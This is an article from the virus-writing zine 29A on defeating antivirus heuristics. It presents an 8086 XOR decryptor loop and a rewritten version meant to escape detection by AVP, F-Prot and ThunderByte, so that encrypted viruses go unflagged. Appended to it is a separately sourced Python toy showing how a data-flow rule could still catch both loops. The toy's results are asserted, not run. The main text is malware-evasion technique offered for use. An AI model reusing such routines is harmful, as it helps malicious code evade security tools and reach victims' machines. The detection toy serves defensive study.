29A Issue 01 03 02
Antiheuristics
═════════════════════════════════════════════════════════════════════>
AVV
We're used to the newest antivirus products promising total protection
against unknown viruses through what they call heuristics. And though
heuristics are an important weapon against viruses, they aren't as safe
as the vendors assure. We won't explain what heuristics are (briefly, the
scanner looks for several instructions common to all viruses, whose
presence gives the virus away). Nevertheless, if we hide these
instructions, the antivirus won't detect anything and will happily say
there's no danger when checking a modified version of Neuroquila, Tremor,
Zhengxi, etc., which will remain encrypted as far as these AVs are
concerned.
The technique is easy. We just have to use a simple encryption routine
which the antivirus won't notice. AVP, F-Prot and ThunderByte recognize
several encryption routines. Now, the following routine decrypts
previously encrypted code:
        lea di,enc_start          ; es:di -> first encrypted byte
        mov cx,enc_size           ; cx has the code's length
 loop1: mov al,byte ptr es:[di]   ; load one byte
        xor al,0cfh               ; we'll simply xor each byte
        stosb                     ; and store it back at es:[di], di++
        loop loop1                ; cx--, repeat while cx != 0
This routine is easily caught by an antivirus, which will then discover
the hidden virus. But let's change the routine slightly:
        lea di,enc_start            ; es:di -> first encrypted byte
        mov si,di                   ; si = di (assumes ds = es, so movsb
                                    ; rewrites each byte onto itself)
        mov cx,enc_size             ; cx has the code's length
        mov dh,0cfh                 ; the key lives in a register now
 loop1: xor byte ptr es:[di],dh     ; xor the byte in place
        movsb                       ; copy ds:[si] -> es:[di], si++, di++
        loop loop1                  ; cx--, repeat while cx != 0
This routine does exactly the same, but isn't caught by the heuristic
scan of any antivirus, so no crappy AV will decrypt anything, and our vi-
rus won't be detected... :) If the programmer is careful not to use any
garbage code, all the AVs will fail to detect any virus, no matter how
famous it is... even Jerusalem! :) This demonstrates that heuristics are
not as safe as they appear to be.
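To see the limit described above from the scanner's side, here is an added illustration, not code from the article or from any of the scanners it names: a toy that first matches a literal instruction pattern against both routines, then applies a data-flow rule (read from memory, xor, write back) instead. Both rules are assumptions made for the example; the routines are the article's, transcribed one instruction per string, plus a constructed copy loop as a control.

```python
import re

# Constructed input: the article's two decryptors, one instruction per string.
ROUTINE_A = ["lea di,enc_start", "mov cx,enc_size",
             "loop1: mov al,byte ptr es:[di]", "xor al,0cfh", "stosb", "loop loop1"]
ROUTINE_B = ["lea di,enc_start", "mov si,di", "mov cx,enc_size", "mov dh,0cfh",
             "loop1: xor byte ptr es:[di],dh", "movsb", "loop loop1"]
# Constructed control: a plain copy loop that is not a decryptor.
COPY_LOOP = ["mov cx,enc_size", "loop1: mov al,byte ptr es:[di]", "stosb", "loop loop1"]

# Rule 1 (assumed): a literal signature of three consecutive instruction prefixes.
SIGNATURE = ("mov al,byte ptr", "xor al,", "stosb")

def signature_hit(routine):
    """True if the signature fragments occur as consecutive instructions."""
    body = [re.sub(r"^\w+:\s*", "", ins) for ins in routine]   # drop labels
    return any(all(body[i + k].startswith(frag) for k, frag in enumerate(SIGNATURE))
               for i in range(len(body) - len(SIGNATURE) + 1))

INSN = re.compile(r"(?:(\w+):\s*)?(\w+)\s*(.*)")   # optional label, mnemonic, operands

def dataflow_hit(routine):
    """Rule 2 (assumed): inside a loop, a byte read from memory is XORed and the
    result is written back to memory, whichever instructions are used for it."""
    tainted, xored, in_loop = set(), set(), False
    for ins in routine:
        label, op, args = INSN.match(ins).groups()
        ops = [a.strip() for a in args.split(",")] if args else []
        if label:
            in_loop = True             # assumption: a label opens the loop body
        if not in_loop:
            continue
        if op == "mov" and len(ops) == 2 and "[" in ops[1]:
            tainted.add(ops[0])        # register now holds a memory byte
        elif op == "xor" and ops:
            if "[" in ops[0]:
                return True            # XOR straight onto memory: load+xor+store
            if ops[0] in tainted:
                xored.add(ops[0])      # register holds a XORed memory byte
        elif op == "stosb" and "al" in xored:
            return True                # XORed byte stored back to memory
        elif op == "loop":
            in_loop = False
    return False
```

The signature rule flags only the first routine, while the data-flow rule flags both and leaves the copy loop alone; the point of the toy is that the rewrite defeats instruction matching, not a rule about what the loop does with the bytes.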
Greets,
AVV.